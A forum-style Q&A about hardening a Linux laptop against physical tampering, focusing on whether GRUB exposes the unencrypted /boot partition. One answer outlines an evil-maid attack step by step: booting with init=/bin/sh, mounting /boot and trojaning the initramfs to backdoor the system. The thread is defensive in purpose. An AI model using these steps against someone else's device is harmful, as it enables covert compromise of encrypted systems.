Laptop tampering and boot loader

Question

I try to find out how far I can secure my laptop from physical access and tampering attempts.

Setup: ThinkPad with Linux installation

What I have done so far:

• disk encryption using cryptsetup for everything except /boot
• entering UEFI setup menu is protected by supervisor password
• all boot devices are disabled except primary SSD with Linux installation
• Bottom cover tamper detection is enabled

Due to the disk encryption, it is not possible to access the data without tampering with the device to sniff the password. Implanting a hardware keylogger should be very hard due to Lenovo's bottom cover tamper detection, which warns me when the cover had been removed. Booting a live system to modify the unencrypted /boot partition is not possible because all other boot devices are disabled. Changing the respective settings in UEFI is not possible due to the supervisor password.

But the attacker is able to boot the system until the grub bootloader appears. Does grub offer any possibilities to tamper with the unencrypted /boot partition?

Answer 1

I recommend locking down GRUB and taking away access to the GRUB shell.

GRUB manual: Authentication and authorisation (Archived here.)

By default, the boot loader interface is accessible to anyone with physical access to the console: anyone can select and edit any menu entry, and anyone can get direct access to a GRUB shell prompt. For most systems, this is reasonable since anyone with direct physical access has a variety of other ways to gain full access, and requiring authentication at the boot loader level would only serve to make it difficult to recover broken systems.

Otherwise somebody might access the GRUB shell and just use the "chainloader" command to boot into another partition's partition boot record (possibly off of a USB drive).

ArchWiki entry on GRUB (Archived here.)

The GRUB's command shell environment can be used to boot operating systems. A common scenario may be to boot Windows / Linux stored on a drive/partition via chainloading.

I haven't tried any of this. But it sounds dangerous enough.

Answer 2

GRUB itself does not let you modify /boot, but it does allow you to boot into a rescue shell in the unencrypted initramfs in /boot, which does.

While GRUB itself does not provide much ability to tamper with /boot, it will allow you to boot into single user mode with a rescue shell. Your /boot contains the bootloader, along with your kernel, and the initramfs (initial RAM filesystem). The initramfs contains misc tools required to boot, as well as tools useful in a rescue environment, such as busybox to provide a lightweight alternative to GNU coreutils, and a shell such as ash. An attacker would simply use GRUB to boot into a rescue shell in your initramfs, which is possible usually by appending init=/bin/sh to the kernel/linux option. This overrides the default init script (/init) and instead tells the initramfs to give you an interactive shell. From there, he could mount /boot and modify it to his heart's content. This is completely possible because all he needs is editing tools (the initramfs contains all useful coreutils, as well as text editors like ed and vi), and the tools need to unpack and repack the initramfs (cpio, which is like tar, and a compression tool like xz or gzip).

If I wanted to attack your laptop, the process would look a little like this:

1. Boot into a GRUB shell, manually set the kernel and the initramfs, and append init=/bin/sh

2. Create /mnt/boot and mount the unencrypted boot partition to it.

3. Decrypt the initramfs and unpack it with cpio into a temporary directory.

4. Modify the init script to do evil things, like add a backdoor to your root filesystem after you decrypt.

5. Repack the initramfs with cpio and recompress it.

6. Overwrite the old initramfs with the trojaned one, power off, and walk away.